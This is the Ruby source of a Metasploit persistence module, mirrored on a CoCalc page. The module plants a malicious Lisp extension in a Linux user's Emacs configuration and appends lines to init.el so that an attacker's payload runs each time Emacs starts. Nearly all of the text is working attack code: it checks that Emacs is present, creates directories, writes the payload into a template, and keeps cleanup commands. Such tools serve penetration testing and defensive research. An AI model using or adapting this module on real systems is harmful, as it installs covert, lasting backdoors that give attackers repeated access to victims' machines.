Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/persistence/emacs_extension.rb
36035 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Exploit::Local::Persistence

11
  prepend Msf::Exploit::Remote::AutoCheck

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Emacs Extension Persistence',

18
        'Description' => %q{

19
          This module adds a lisp based malicious extension to the emacs configuration file.

20
          When emacs is opened, the extension will be loaded and the payload will be executed.

21


22
          Tested against emacs 29.3 build 1 on Ubuntu Desktop 24.04.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'h00die'

27
        ],

28
        'Platform' => [ 'linux' ],

29
        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],

30
        'SessionTypes' => [ 'meterpreter' ],

31
        'Targets' => [[ 'Auto', {} ]],

32
        'Privileged' => true,

33
        'References' => [

34
          # Leo Laporte [02:39:08]: Plus, as easy as it would be to write a malicious plugin for Emacs, I don't think anybody's going to do that. The pickings are slim, let's put it that way.

35
          [ 'URL', 'https://twit.tv/posts/transcripts/security-now-1061-transcript'],

36
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION]

37
        ],

38
        'DisclosureDate' => '2026-01-28',

39
        'DefaultTarget' => 0,

40
        'Notes' => {

41
          'Stability' => [CRASH_SAFE],

42
          'Reliability' => [REPEATABLE_SESSION],

43
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]

44
        }

45
      )

46
    )

47
    register_advanced_options [

48
      OptString.new('NAME', [ false, 'Name of the extension. Defaults to random', '' ]),

49
      OptString.new('CONFIG_FILE', [ false, 'Config file location on target. Defaults to ~/init.el', '' ]),

50
    ]

51


52
    deregister_options('WritableDir')

53
  end

54


55
  def check

56
    return CheckCode::Safe('emacs is required') unless command_exists?('emacs')

57


58
    CheckCode::Detected('emacs is installed')

59
  end

60


61
  def plugin_name

62
    return datastore['NAME'] unless datastore['NAME'].empty?

63


64
    Rex::Text.rand_text_alpha(5..10)

65
  end

66


67
  def get_home

68
    return cmd_exec('echo ~').strip

69
  end

70


71
  def install_persistence

72
    p_name = plugin_name

73
    vprint_status("Using plugin name: #{p_name}")

74
    emacs_dir = "#{get_home}/.emacs.d"

75
    config_file = datastore['CONFIG_FILE'].empty? ? "#{emacs_dir}/init.el" : datastore['CONFIG_FILE']

76
    lisp_dir = "#{emacs_dir}/lisp"

77
    extension_file = "#{lisp_dir}/#{p_name}.el"

78


79
    if file?(config_file)

80
      config_contents = read_file(config_file)

81
      path = store_loot('init.el', 'text/x-common-lisp', session, config_contents, nil, nil)

82
      print_good("Original config file saved in: #{path}")

83
      @clean_up_rc << "upload #{path} #{config_file}\n"

84
    else

85
      print_status("#{config_file} does not exist, creating it")

86
      cmd_exec("mkdir #{emacs_dir}") unless directory?(emacs_dir) # don't use mkdir since that auto deletes on module finish

87
      write_file(config_file, '')

88
      @clean_up_rc << "rm #{config_file}\n"

89
    end

90


91
    unless directory?(lisp_dir)

92
      cmd_exec("mkdir #{lisp_dir}")

93
      @clean_up_rc << "rmdir #{lisp_dir}\n"

94
    end

95


96
    fail_with(Failure::UnexpectedReply, "Unable to append to extension to #{config_file}") unless append_file(config_file, "\n(add-to-list 'load-path \"#{lisp_dir}\")\n(require '#{p_name})\n")

97


98
    emacs_extension = File.read(File.join(

99
      Msf::Config.data_directory, 'exploits', 'emacs_extension', 'template.el'

100
    ))

101
    emacs_extension = emacs_extension.gsub('PAYLOAD_PLACEHOLDER', payload.encoded)

102


103
    emacs_extension = emacs_extension.gsub('PLUGIN_NAME', p_name)

104
    fail_with(Failure::UnexpectedReply, "Unable to write extension #{extension_file}") unless write_file(extension_file, emacs_extension)

105
    @clean_up_rc << "rm #{extension_file}\n"

106
  end

107
end

108


109